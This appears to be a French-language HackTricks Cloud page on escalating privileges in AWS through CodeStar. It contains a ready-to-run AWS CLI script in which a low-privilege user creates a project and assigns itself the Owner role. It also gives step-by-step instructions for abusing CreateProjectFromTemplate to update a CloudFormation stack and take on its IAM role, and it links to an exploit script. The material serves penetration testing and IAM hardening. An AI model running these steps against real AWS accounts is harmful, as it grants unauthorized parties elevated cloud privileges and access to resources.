AWS - Codestar Privesc
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
Codestar
Vous pouvez trouver plus dâinformations sur codestar dans :
codestar:CreateProject, codestar:AssociateTeamMember
iam:PassRole, codestar:CreateProject
Avec ces permissions, vous pouvez abuser dâun rĂŽle IAM codestar pour effectuer des actions arbitraires via un modĂšle cloudformation. Consultez la page suivante :
iam:PassRole, codestar:CreateProject
codestar:CreateProject, codestar:AssociateTeamMember
Cette technique utilise codestar:CreateProject pour crĂ©er un projet codestar, et codestar:AssociateTeamMember pour faire dâun utilisateur IAM le propriĂ©taire dâun nouveau projet CodeStar, ce qui leur accordera une nouvelle politique avec quelques permissions supplĂ©mentaires.
PROJECT_NAME="supercodestar"
aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME
echo "Waiting 1min to start the project"
sleep 60
USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed
Si vous ĂȘtes dĂ©jĂ un membre du projet, vous pouvez utiliser la permission codestar:UpdateTeamMember pour mettre Ă jour votre rĂŽle en tant que propriĂ©taire au lieu de codestar:AssociateTeamMember.
Impact potentiel : Privesc à la politique codestar générée. Vous pouvez trouver un exemple de cette politique dans :
codestar:CreateProject, codestar:AssociateTeamMember
codestar:CreateProjectFromTemplate
- Créer un nouveau projet :
- Utilisez lâaction
codestar:CreateProjectFromTemplatepour initier la crĂ©ation dâun nouveau projet. - AprĂšs une crĂ©ation rĂ©ussie, lâaccĂšs est automatiquement accordĂ© pour
cloudformation:UpdateStack. - Cet accÚs cible spécifiquement une pile associée au rÎle IAM
CodeStarWorker-<nom de projet générique>-CloudFormation.
- Mettre Ă jour la pile cible :
- Avec les permissions CloudFormation accordées, procédez à la mise à jour de la pile spécifiée.
- Le nom de la pile conformera gĂ©nĂ©ralement Ă lâun des deux modĂšles :
awscodestar-<nom de projet gĂ©nĂ©rique>-infrastructureawscodestar-<nom de projet gĂ©nĂ©rique>-lambda- Le nom exact dĂ©pend du modĂšle choisi (se rĂ©fĂ©rant au script dâexploitation exemple).
- AccĂšs et permissions :
- AprÚs la mise à jour, vous obtenez les capacités assignées au rÎle IAM CloudFormation lié à la pile.
- Remarque : Cela ne fournit pas intrinsĂšquement des privilĂšges dâadministrateur complets. Des ressources mal configurĂ©es supplĂ©mentaires dans lâenvironnement pourraient ĂȘtre nĂ©cessaires pour Ă©lever davantage les privilĂšges.
Pour plus dâinformations, consultez la recherche originale : https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/.
Vous pouvez trouver lâexploitation dans https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py
Impact potentiel : Privesc au rĂŽle IAM cloudformation.
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
HackTricks Cloud

